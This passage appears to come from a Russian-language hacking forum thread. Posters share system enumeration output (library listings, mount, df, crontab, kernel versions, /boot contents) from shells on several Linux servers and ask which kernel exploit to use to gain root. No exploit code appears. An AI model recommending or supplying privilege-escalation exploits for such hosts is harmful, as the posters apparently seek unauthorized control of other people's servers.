    -r-xr-xr-x 1 root root 1779936 2014-01-08 13:48:10.000000000 +0400 libcrypto.so
    .1.0.0
    lrwxrwxrwx 1 root root 16 2016-04-13 12:50:51.982563749 +0400 libcrypt.so.
    1 -> libcrypt-2.15.so
    lrwxrwxrwx 1 root root 12 2016-04-13 12:50:51.974563749 +0400 libc.so.6 ->
    libc-2.15.so
    -rwxr-xr-x 1 root root 17364 2012-12-20 15:59:40.000000000 +0400 libdl-2.15.s
    o
    lrwxrwxrwx 1 root root 13 2016-04-13 12:50:51.982563749 +0400 libdl.so.2 -
    > libdl-2.15.so
    -rwxr-xr-x 1 root root 116348 2011-10-29 18:53:08.000000000 +0400 libgcc_s.so.
    1
    lrwxrwxrwx 1 root root 18 2016-04-13 12:50:54.122563749 +0400 libkeyutils.
    so.1 -> libkeyutils.so.1.4
    -rwxr-xr-x 1 root root 13836 2012-07-15 08:02:45.000000000 +0400 libkeyutils.
    so.1.4
    -rwxr-xr-x 1 root root 201625 2012-12-20 15:59:40.000000000 +0400 libm-2.15.so

    lrwxrwxrwx 1 root root 12 2016-04-13 12:50:51.994563749 +0400 libm.so.6 ->
    libm-2.15.so
    lrwxrwxrwx 1 root root 17 2016-04-13 12:50:54.022563749 +0400 libncurses.s
    o.5 -> libncurses.so.5.9
    -rwxr-xr-x 1 root root 153404 2012-08-04 11:21:16.000000000 +0400 libncurses.s
    o.5.9
    lrwxrwxrwx 1 root root 18 2016-04-13 12:50:54.026563749 +0400 libncursesw.
    so.5 -> libncursesw.so.5.9
    -rwxr-xr-x 1 root root 214928 2012-08-04 11:21:16.000000000 +0400 libncursesw.
    so.5.9
    -rwxr-xr-x 1 root root 103129 2012-12-20 15:59:40.000000000 +0400 libnsl-2.15.
    so
    lrwxrwxrwx 1 root root 14 2016-04-13 12:50:51.998563749 +0400 libnsl.so.1
    -> libnsl-2.15.so
    -rwxr-xr-x 1 root root 36121 2012-12-20 15:59:40.000000000 +0400 libnss_compa
    t-2.15.so
    lrwxrwxrwx 1 root root 21 2016-04-13 12:50:51.998563749 +0400 libnss_compa
    t.so.2 -> libnss_compat-2.15.so
    -rwxr-xr-x 1 root root 35316 2012-12-20 15:59:40.000000000 +0400 libnss_db-2.
    15.so
    lrwxrwxrwx 1 root root 17 2016-04-13 12:50:51.998563749 +0400 libnss_db.so
    .2 -> libnss_db-2.15.so
    -rwxr-xr-x 1 root root 25555 2012-12-20 15:59:40.000000000 +0400 libnss_dns-2
    .15.so
    lrwxrwxrwx 1 root root 18 2016-04-13 12:50:51.998563749 +0400 libnss_dns.s
    o.2 -> libnss_dns-2.15.so
    -rwxr-xr-x 1 root root 59240 2012-12-20 15:59:40.000000000 +0400 libnss_files
    -2.15.so
    lrwxrwxrwx 1 root root 20 2016-04-13 12:50:52.002563749 +0400 libnss_files
    .so.2 -> libnss_files-2.15.so
    -rwxr-xr-x 1 root root 21937 2012-12-20 15:59:40.000000000 +0400 libnss_hesio
    d-2.15.so
    lrwxrwxrwx 1 root root 21 2016-04-13 12:50:52.026563749 +0400 libnss_hesio
    d.so.2 -> libnss_hesiod-2.15.so
    -rwxr-xr-x 1 root root 88320 2012-07-16 02:07:52.000000000 +0400 libnss_ldap.
    so.2
    -rwxr-xr-x 1 root root 49852 2012-12-20 15:59:40.000000000 +0400 libnss_nis-2
    .15.so
    -rwxr-xr-x 1 root root 58621 2012-12-20 15:59:40.000000000 +0400 libnss_nispl
    us-2.15.so
    lrwxrwxrwx 1 root root 22 2016-04-13 12:50:52.030563749 +0400 libnss_nispl
    us.so.2 -> libnss_nisplus-2.15.so
    lrwxrwxrwx 1 root root 18 2016-04-13 12:50:52.026563749 +0400 libnss_nis.s
    o.2 -> libnss_nis-2.15.so
    -rwxr-xr-x 1 root root 1533916 2013-11-12 13:16:05.000000000 +0400 libnss_wins.
    so.2
    -rwxr-xr-x 1 root root 124731 2012-12-20 15:59:40.000000000 +0400 libpthread-2
    .15.so
    lrwxrwxrwx 1 root root 18 2016-04-13 12:50:52.030563749 +0400 libpthread.s
    o.0 -> libpthread-2.15.so
    -rwxr-xr-x 1 root root 94458 2012-12-20 15:59:40.000000000 +0400 libresolv-2.
    15.so
    lrwxrwxrwx 1 root root 17 2016-04-13 12:50:52.034563749 +0400 libresolv.so
    .2 -> libresolv-2.15.so
    -rwxr-xr-x 1 root root 38955 2012-12-20 15:59:40.000000000 +0400 librt-2.15.s
    o
    lrwxrwxrwx 1 root root 13 2016-04-13 12:50:52.034563749 +0400 librt.so.1 -
    > librt-2.15.so
    -rwxr-xr-x 1 root root 16226 2012-12-20 15:59:40.000000000 +0400 libSegFault.
    so
    -rwxr-xr-x 1 root root 116784 2012-07-16 12:50:58.000000000 +0400 libselinux.s
    o.1
    -r-xr-xr-x 1 root root 403600 2014-01-08 13:48:10.000000000 +0400 libssl.so.1.
    0.0
    lrwxrwxrwx 1 root root 19 2016-04-13 12:50:54.406563749 +0400 libss.so.2 -
    > /usr/lib/libss.so.2
    lrwxrwxrwx 1 root root 21 2016-04-13 12:50:54.406563749 +0400 libss.so.2.0
    -> /usr/lib/libss.so.2.0
    -rwxr-xr-x 1 root root 34643 2012-12-20 15:59:40.000000000 +0400 libthread_db
    -1.0.so
    lrwxrwxrwx 1 root root 19 2016-04-13 12:50:52.038563749 +0400 libthread_db
    .so.1 -> libthread_db-1.0.so
    lrwxrwxrwx 1 root root 15 2016-04-13 12:50:54.034563749 +0400 libtinfo.so.
    5 -> libtinfo.so.5.9
    -rwxr-xr-x 1 root root 156536 2012-08-04 11:21:16.000000000 +0400 libtinfo.so.
    5.9
    -rwxr-xr-x 1 root root 12614 2012-12-20 15:59:40.000000000 +0400 libutil-2.15
    .so
    lrwxrwxrwx 1 root root 15 2016-04-13 12:50:52.038563749 +0400 libutil.so.1
    -> libutil-2.15.so
    lrwxrwxrwx 1 root root 13 2016-04-13 12:50:53.862563749 +0400 libz.so.1 ->
    libz.so.1.2.7
    -rwxr-xr-x 1 root root 87544 2012-07-15 03:28:10.000000000 +0400 libz.so.1.2.
    7
    drwxr-xr-x 2 root root 4096 2016-04-13 12:51:21.886563749 +0400 lsb
    drwxr-xr-x 7 root root 4096 2013-05-28 16:02:34.000000000 +0400 mkinitrd
    drwxr-xr-x 3 root root 4096 2016-04-13 12:54:25.344797032 +0400 modules
    drwxr-xr-x 2 root root 4096 2016-04-13 12:51:40.289982937 +0400 sysctl.d
    drwxr-xr-x 7 root root 4096 2012-10-05 14:40:18.000000000 +0400 systemd
    drwxr-xr-x 2 root root 4096 2016-04-13 12:51:44.557982937 +0400 sysvinit
    drwxr-xr-x 5 root root 4096 2016-04-13 12:54:50.076221936 +0400 udev
    drwxr-xr-x 2 root root 4096 2016-04-13 12:52:03.805982937 +0400 YaST
    sh-4.2$ mount
    mount
    devtmpfs on /dev type devtmpfs (rw,relatime,size=1189340k,nr_inodes=297335,mode=
    755)
    tmpfs on /dev/shm type tmpfs (rw,relatime)
    tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
    devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)
    /dev/mapper/vm8581_system-root on / type ext4 (rw,relatime,nobarrier,errors=pani
    c,data=ordered)
    proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
    cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,re
    lease_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
    cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpu
    set)
    cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatim
    e,cpuacct,cpu)
    cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,mem
    ory)
    cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,de
    vices)
    cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,fr
    eezer)
    cgroup on /sys/fs/cgroup/net_cls type cgroup (rw,nosuid,nodev,noexec,relatime,ne
    t_cls)
    cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blki
    o)
    cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime
    ,perf_event)
    systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=26,pgrp=1,time
    out=300,minproto=5,maxproto=5,direct)
    tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,relatime,mode=755)
    securityfs on /sys/kernel/security type securityfs (rw,relatime)
    tmpfs on /media type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
    tmpfs on /var/run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
    debugfs on /sys/kernel/debug type debugfs (rw,relatime)
    mqueue on /dev/mqueue type mqueue (rw,relatime)
    /dev/xvda1 on /boot type ext3 (rw,relatime,errors=panic,barrier=0,data=ordered)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
    sh-4.2$ df -h
    df -h
    Filesystem Size Used Avail Use% Mounted on
    rootfs 146G 135G 3.7G 98% /
    devtmpfs 1.2G 36K 1.2G 1% /dev
    tmpfs 1.3G 0 1.3G 0% /dev/shm
    tmpfs 1.3G 104K 1.3G 1% /run
    /dev/mapper/vm8581_system-root 146G 135G 3.7G 98% /
    tmpfs 1.3G 0 1.3G 0% /sys/fs/cgroup
    tmpfs 1.3G 104K 1.3G 1% /var/lock
    tmpfs 1.3G 0 1.3G 0% /media
    tmpfs 1.3G 104K 1.3G 1% /var/run
    /dev/xvda1 152M 28M 116M 20% /boot
    sh-4.2$ cat /etc/issue
    cat /etc/issue
    Welcome to openSUSE 12.2 "Mantis" - Kernel \r (\l).


    sh-4.2$ cat /etc/crontab
    cat /etc/crontab
    SHELL=/bin/sh
    PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin
    MAILTO=root
    #
    # check scripts in cron.hourly, cron.daily, cron.weekly, and cron.monthly
    #
    -*/15 * * * * root test -x /usr/lib/cron/run-crons && /usr/lib/cron/run-crons
    >/dev/null 2>&1

    sh-4.2$ cat /proc/version
    cat /proc/version
    Linux version 3.4.63-2.44-xen (geeko@buildhost) (gcc version 4.7.1 20120723 [gcc
    -4_7-branch revision 189773] (SUSE Linux) ) #1 SMP Wed Oct 2 11:18:32 UTC 2013 (
    d91a619)
     
    #616 LETIFERUM, 14 Apr 2016
    Last edited: 14 Apr 2016
  17. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Linux XXXXXXX 2.6.18-406.el5.028stab119.3 #1 SMP Tue Sep 15 16:46:46 MSD 2015 x86_64 x86_64 x86_64 GNU/Linux
    Подскажите сплоит, в этой теме новичок.Буду пробовать 1й раз.:)
     
  18. semik

    semik New Member

    Joined:
    6 Dec 2013
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажите варианты:


    $ uname -a
    Linux *** 2.6.32-573.12.1.el6.x86_64 #1 SMP Tue Dec 15 21:19:08 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot
    total 170848
    dr-xr-xr-x. 5 root root 4096 Mar 18 19:55 .
    dr-xr-xr-x. 25 root root 4096 Apr 24 21:43 ..
    -rw-r--r--. 1 root root 107139 Dec 15 13:48 config-2.6.32-573.12.1.el6.x86_64
    -rw-r--r--. 1 root root 107139 Feb 9 15:15 config-2.6.32-573.18.1.el6.x86_64
    -rw-r--r--. 1 root root 107138 Aug 13 2015 config-2.6.32-573.3.1.el6.x86_64
    -rw-r--r--. 1 root root 107138 Sep 22 2015 config-2.6.32-573.7.1.el6.x86_64
    -rw-r--r--. 1 root root 107138 Nov 10 10:31 config-2.6.32-573.8.1.el6.x86_64
    drwxr-xr-x. 3 root root 4096 Dec 27 2014 efi
    drwxr-xr-x. 2 root root 4096 Mar 18 19:55 grub
    -rw-------. 1 root root 24858048 Dec 25 12:50 initramfs-2.6.32-573.12.1.el6.x86_64.img
    -rw-------. 1 root root 24860506 Mar 18 19:55 initramfs-2.6.32-573.18.1.el6.x86_64.img
    -rw-------. 1 root root 24833443 Aug 22 2015 initramfs-2.6.32-573.3.1.el6.x86_64.img
    -rw-------. 1 root root 24848591 Oct 18 2015 initramfs-2.6.32-573.7.1.el6.x86_64.img
    -rw-------. 1 root root 24843684 Dec 12 10:49 initramfs-2.6.32-573.8.1.el6.x86_64.img
    -rw-------. 1 root root 4909993 Feb 29 13:37 initrd-2.6.32-573.12.1.el6.x86_64kdump.img
    -rw-------. 1 root root 4918404 Aug 23 2015 initrd-2.6.32-573.3.1.el6.x86_64kdump.img
    -rw-------. 1 root root 4886463 Nov 29 01:56 initrd-2.6.32-573.7.1.el6.x86_64kdump.img
    drwx------. 2 root root 16384 Dec 27 2014 lost+found
    -rw-r--r--. 1 root root 206008 Dec 15 13:49 symvers-2.6.32-573.12.1.el6.x86_64.gz
    -rw-r--r--. 1 root root 206010 Feb 9 15:16 symvers-2.6.32-573.18.1.el6.x86_64.gz
    -rw-r--r--. 1 root root 205998 Aug 13 2015 symvers-2.6.32-573.3.1.el6.x86_64.gz
    -rw-r--r--. 1 root root 205998 Sep 22 2015 symvers-2.6.32-573.7.1.el6.x86_64.gz
    -rw-r--r--. 1 root root 205991 Nov 10 10:32 symvers-2.6.32-573.8.1.el6.x86_64.gz
    -rw-r--r--. 1 root root 2585672 Dec 15 13:48 System.map-2.6.32-573.12.1.el6.x86_64
    -rw-r--r--. 1 root root 2586114 Feb 9 15:15 System.map-2.6.32-573.18.1.el6.x86_64
    -rw-r--r--. 1 root root 2585088 Aug 13 2015 System.map-2.6.32-573.3.1.el6.x86_64
    -rw-r--r--. 1 root root 2585416 Sep 22 2015 System.map-2.6.32-573.7.1.el6.x86_64
    -rw-r--r--. 1 root root 2585424 Nov 10 10:31 System.map-2.6.32-573.8.1.el6.x86_64
    -rwxr-xr-x. 1 root root 4221232 Dec 15 13:48 vmlinuz-2.6.32-573.12.1.el6.x86_64
    -rw-r--r--. 1 root root 171 Dec 15 13:48 .vmlinuz-2.6.32-573.12.1.el6.x86_64.hmac
    -rwxr-xr-x. 1 root root 4221968 Feb 9 15:15 vmlinuz-2.6.32-573.18.1.el6.x86_64
    -rw-r--r--. 1 root root 171 Feb 9 15:15 .vmlinuz-2.6.32-573.18.1.el6.x86_64.hmac
    -rwxr-xr-x. 1 root root 4221776 Aug 13 2015 vmlinuz-2.6.32-573.3.1.el6.x86_64
    -rw-r--r--. 1 root root 170 Aug 13 2015 .vmlinuz-2.6.32-573.3.1.el6.x86_64.hmac
    -rwxr-xr-x. 1 root root 4220144 Sep 22 2015 vmlinuz-2.6.32-573.7.1.el6.x86_64
    -rw-r--r--. 1 root root 170 Sep 22 2015 .vmlinuz-2.6.32-573.7.1.el6.x86_64.hmac
    -rwxr-xr-x. 1 root root 4220368 Nov 10 10:31 vmlinuz-2.6.32-573.8.1.el6.x86_64
    -rw-r--r--. 1 root root 170 Nov 10 10:31 .vmlinuz-2.6.32-573.8.1.el6.x86_64.hma

    $ ls -la --full-time /lib64
    total 24836
    dr-xr-xr-x. 11 root root 12288 2016-03-19 03:15:39.407798605 -0700 .
    dr-xr-xr-x. 25 root root 4096 2016-04-24 21:43:01.567027756 -0700 ..
    drwxr-xr-x. 2 root root 4096 2016-03-01 03:15:54.531834095 -0800 dbus-1
    drwxr-xr-x. 2 root root 4096 2015-12-25 12:47:27.124053456 -0800 device-mapper
    -rwxr-xr-x. 1 root root 157072 2016-02-16 10:37:59.000000000 -0800 ld-2.12.so
    lrwxrwxrwx. 1 root root 10 2016-02-29 13:36:01.664970844 -0800 ld-linux-x86-64.so.2 -> ld-2.12.so
    lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:24.299000140 -0800 libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x. 1 root root 33816 2011-12-07 08:53:53.000000000 -0800 libacl.so.1.1.0
    lrwxrwxrwx. 1 root root 22 2014-12-27 14:20:43.920000141 -0800 libaio.so.1 -> /lib64/libaio.so.1.0.1
    -rwxr-xr-x. 1 root root 3944 2010-08-22 14:08:18.000000000 -0700 libaio.so.1.0.0
    -rwxr-xr-x. 1 root root 5624 2010-08-22 14:08:18.000000000 -0700 libaio.so.1.0.1
    -rwxr-xr-x. 1 root root 19368 2016-02-16 10:38:00.000000000 -0800 libanl-2.12.so
    lrwxrwxrwx. 1 root root 14 2016-02-29 13:36:01.682970512 -0800 libanl.so.1 -> libanl-2.12.so
    lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:59.514000140 -0800 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x. 1 root root 963768 2011-12-07 10:22:39.000000000 -0800 libasound.so.2.0.0
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:22.627000141 -0800 libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x. 1 root root 21152 2011-09-23 11:53:58.000000000 -0700 libattr.so.1.1.0
    lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:11.147000140 -0800 libaudit.so.1 -> libaudit.so.1.0.0
    -rwxr-xr-x. 1 root root 144208 2014-10-15 05:54:13.000000000 -0700 libaudit.so.1.0.0
    lrwxrwxrwx. 1 root root 19 2014-12-27 14:27:11.154000140 -0800 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x. 1 root root 87024 2014-10-15 05:54:13.000000000 -0700 libauparse.so.0.0.0
    lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:11.658000141 -0800 libblkid.so.1 -> libblkid.so.1.1.0
    -rwxr-xr-x. 1 root root 138616 2014-10-15 03:38:28.000000000 -0700 libblkid.so.1.1.0
    -rwxr-xr-x. 1 root root 8488 2016-02-16 10:38:00.000000000 -0800 libBrokenLocale-2.12.so
    lrwxrwxrwx. 1 root root 23 2016-02-29 13:36:01.678970584 -0800 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:24.275000141 -0800 libbz2.so.1 -> libbz2.so.1.0.4
    -rwxr-xr-x. 1 root root 69976 2011-06-24 18:45:55.000000000 -0700 libbz2.so.1.0.4
    -rwxr-xr-x. 1 root root 1926520 2016-02-16 10:38:01.000000000 -0800 libc-2.12.so
    lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:29.251000141 -0800 libcap-ng.so.0 -> libcap-ng.so.0.0.0
    -rwxr-xr-x. 1 root root 18672 2011-06-24 20:49:32.000000000 -0700 libcap-ng.so.0.0.0
    lrwxrwxrwx. 1 root root 14 2014-12-27 14:20:22.642000141 -0800 libcap.so.2 -> libcap.so.2.16
    -rwxr-xr-x. 1 root root 19016 2011-12-07 12:04:01.000000000 -0800 libcap.so.2.16
    lrwxrwxrwx. 1 root root 19 2015-08-22 10:46:43.303032430 -0700 libcgroup.so.1 -> libcgroup.so.1.0.40
    -rwxr-xr-x. 1 root root 103096 2015-07-23 11:08:39.000000000 -0700 libcgroup.so.1.0.40
    -rwxr-xr-x. 1 root root 197064 2016-02-16 10:37:59.000000000 -0800 libcidn-2.12.so
    lrwxrwxrwx. 1 root root 15 2016-02-29 13:36:01.846967484 -0800 libcidn.so.1 -> libcidn-2.12.so
    lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:57.894714977 -0700 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x. 1 root root 17256 2015-07-24 03:33:24.000000000 -0700 libcom_err.so.2.1
    -rwxr-xr-x. 1 root root 43392 2016-02-16 10:37:59.000000000 -0800 libcrypt-2.12.so
    lrwxrwxrwx. 1 root root 22 2014-12-27 14:27:30.294000140 -0800 libcryptsetup.so.1 -> libcryptsetup.so.1.1.0
    -rwxr-xr-x. 1 root root 97536 2014-10-15 04:50:42.000000000 -0700 libcryptsetup.so.1.1.0
    -rw-r--r--. 1 root root 65 2014-10-15 04:50:43.000000000 -0700 .libcryptsetup.so.1.1.0.hmac
    -rw-r--r--. 1 root root 65 2014-10-15 04:50:43.000000000 -0700 .libcryptsetup.so.1.hmac
    lrwxrwxrwx. 1 root root 16 2016-02-29 13:36:01.850967411 -0800 libcrypt.so.1 -> libcrypt-2.12.so
    lrwxrwxrwx. 1 root root 12 2016-02-29 13:36:01.827967835 -0800 libc.so.6 -> libc-2.12.so
    -rwxr-xr-x. 1 root root 976976 2010-11-10 19:07:19.000000000 -0800 libdb-4.2.so
    -rwxr-xr-x. 1 root root 1043696 2010-11-10 19:07:19.000000000 -0800 libdb-4.3.so
    -rwxr-xr-x. 1 root root 1525480 2015-09-22 08:18:59.000000000 -0700 libdb-4.7.so
    -rwxr-xr-x. 1 root root 1055928 2010-11-10 19:07:19.000000000 -0800 libdb_cxx-4.2.so
    -rwxr-xr-x. 1 root root 1139224 2010-11-10 19:07:19.000000000 -0800 libdb_cxx-4.3.so
    lrwxrwxrwx. 1 root root 18 2015-05-25 13:25:45.618349293 -0700 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x. 1 root root 268232 2015-04-22 03:52:25.000000000 -0700 libdbus-1.so.3.4.0
    lrwxrwxrwx. 1 root root 46 2015-12-25 12:47:27.126053420 -0800 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
    lrwxrwxrwx. 1 root root 44 2015-12-25 12:47:27.127053402 -0800 libdevmapper-event-lvm2raid.so -> device-mapper/libdevmapper-event-lvm2raid.so
    lrwxrwxrwx. 1 root root 48 2015-12-25 12:47:27.129053365 -0800 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
    -rwxr-xr-x. 1 root root 10328 2015-12-15 06:49:46.000000000 -0800 libdevmapper-event-lvm2.so.2.02
    lrwxrwxrwx. 1 root root 44 2015-12-25 12:47:27.131053328 -0800 libdevmapper-event-lvm2thin.so -> device-mapper/libdevmapper-event-lvm2thin.so
    -rwxr-xr-x. 1 root root 25488 2015-12-15 06:49:47.000000000 -0800 libdevmapper-event.so.1.02
    -rwxr-xr-x. 1 root root 297960 2015-12-15 06:49:47.000000000 -0800 libdevmapper.so.1.02
    -rwxr-xr-x. 1 root root 22536 2016-02-16 10:37:59.000000000 -0800 libdl-2.12.so
    lrwxrwxrwx. 1 root root 13 2016-02-29 13:36:01.852967374 -0800 libdl.so.2 -> libdl-2.12.so
    lrwxrwxrwx. 1 root root 34 2014-12-27 14:22:08.396000141 -0800 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc16
    lrwxrwxrwx. 1 root root 34 2014-12-27 14:22:08.396000141 -0800 libdmraid-events-isw.so.1 -> libdmraid-events-isw.so.1.0.0.rc16
    -rwxr-xr-x. 1 root root 23784 2012-06-22 00:58:31.000000000 -0700 libdmraid-events-isw.so.1.0.0.rc16
    lrwxrwxrwx. 1 root root 23 2014-12-27 14:22:08.397000141 -0800 libdmraid.so -> libdmraid.so.1.0.0.rc16
    lrwxrwxrwx. 1 root root 23 2014-12-27 14:22:08.398000141 -0800 libdmraid.so.1 -> libdmraid.so.1.0.0.rc16
    -rwxr-xr-x. 1 root root 219616 2012-06-22 00:58:31.000000000 -0700 libdmraid.so.1.0.0.rc16
    lrwxrwxrwx. 1 root root 13 2015-08-22 10:45:02.493641603 -0700 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x. 1 root root 30552 2015-07-24 03:33:24.000000000 -0700 libe2p.so.2.3
    lrwxrwxrwx. 1 root root 17 2014-12-27 14:20:26.140000141 -0800 libexpat.so.1 -> libexpat.so.1.5.2
    -rwxr-xr-x. 1 root root 167648 2012-06-13 08:01:40.000000000 -0700 libexpat.so.1.5.2
    lrwxrwxrwx. 1 root root 16 2015-08-22 10:45:02.497641539 -0700 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x. 1 root root 204296 2015-07-24 03:33:24.000000000 -0700 libext2fs.so.2.4
    lrwxrwxrwx. 1 root root 21 2014-12-27 14:21:02.458000140 -0800 libfipscheck.so.1 -> libfipscheck.so.1.1.0
    -rwxr-xr-x. 1 root root 12688 2011-12-07 11:13:53.000000000 -0800 libfipscheck.so.1.1.0
    -rw-r--r--. 1 root root 65 2011-12-07 11:13:53.000000000 -0800 .libfipscheck.so.1.1.0.hmac
    lrwxrwxrwx. 1 root root 27 2014-12-27 14:21:02.458000140 -0800 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac
    -rw-r--r--. 1 root root 899 2015-08-31 22:54:27.000000000 -0700 libfreebl3.chk
    -rwxr-xr-x. 1 root root 12776 2015-08-31 22:54:27.000000000 -0700 libfreebl3.so
    -rw-r--r--. 1 root root 899 2015-08-31 22:54:27.000000000 -0700 libfreeblpriv3.chk
    -rwxr-xr-x. 1 root root 477712 2015-08-31 22:54:27.000000000 -0700 libfreeblpriv3.so
    -rwxr-xr-x. 1 root root 93320 2015-07-22 18:03:32.000000000 -0700 libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx. 1 root root 28 2015-08-22 10:44:34.630086159 -0700 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx. 1 root root 19 2014-12-27 14:27:20.690000141 -0800 libgcrypt.so.11 -> libgcrypt.so.11.5.3
    -rwxr-xr-x. 1 root root 481064 2013-10-24 08:38:14.000000000 -0700 libgcrypt.so.11.5.3
    -rw-r--r--. 1 root root 65 2013-10-24 08:38:14.000000000 -0700 .libgcrypt.so.11.hmac
    lrwxrwxrwx. 1 root root 22 2014-12-27 14:27:09.854000141 -0800 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8
    -rwxr-xr-x. 1 root root 1150296 2014-10-15 11:33:43.000000000 -0700 libgio-2.0.so.0.2800.8
    lrwxrwxrwx. 1 root root 23 2014-12-27 14:27:09.921000140 -0800 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8
    -rwxr-xr-x. 1 root root 1142944 2014-10-15 11:33:43.000000000 -0700 libglib-2.0.so.0.2800.8
    lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:09.991000140 -0800 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8
    -rwxr-xr-x. 1 root root 14280 2014-10-15 11:33:43.000000000 -0700 libgmodule-2.0.so.0.2800.8
    lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:09.992000140 -0800 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8
    -rwxr-xr-x. 1 root root 311368 2014-10-15 11:33:43.000000000 -0700 libgobject-2.0.so.0.2800.8
    lrwxrwxrwx. 1 root root 21 2014-12-27 14:20:26.638000141 -0800 libgpg-error.so.0 -> libgpg-error.so.0.5.0
    -rwxr-xr-x. 1 root root 16656 2011-12-07 09:37:21.000000000 -0800 libgpg-error.so.0.5.0
    lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:57.995713365 -0700 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2
    -rwxr-xr-x. 1 root root 280520 2015-07-23 20:28:26.000000000 -0700 libgssapi_krb5.so.2.2
    lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:58.018712998 -0700 libgssrpc.so.4 -> libgssrpc.so.4.1
    -rwxr-xr-x. 1 root root 131384 2015-07-23 20:28:26.000000000 -0700 libgssrpc.so.4.1
    lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:10.011000140 -0800 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8
    -rwxr-xr-x. 1 root root 20016 2014-10-15 11:33:43.000000000 -0700 libgthread-2.0.so.0.2800.8
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:27.153000141 -0800 libidn.so.11 -> libidn.so.11.6.1
    -rwxr-xr-x. 1 root root 209120 2010-08-23 17:51:20.000000000 -0700 libidn.so.11.6.1
    lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.226268921 -0700 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64
    lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.226268921 -0700 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64
    -rwxr-xr-x. 1 root root 28672 2015-07-23 19:10:22.000000000 -0700 libip4tc.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 23 2015-08-22 10:45:35.215119546 -0700 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.226268921 -0700 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64
    lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.226268921 -0700 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64
    -rwxr-xr-x. 1 root root 30376 2015-07-23 19:10:22.000000000 -0700 libip6tc.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 23 2015-08-22 10:45:35.219119482 -0700 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 32 2015-08-22 10:48:32.226268921 -0700 libipq.so.0 -> /etc/alternatives/libipq0.x86_64
    lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.227268901 -0700 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64
    -rwxr-xr-x. 1 root root 9280 2015-07-23 19:10:22.000000000 -0700 libipq.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 21 2015-08-22 10:45:35.222119434 -0700 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7
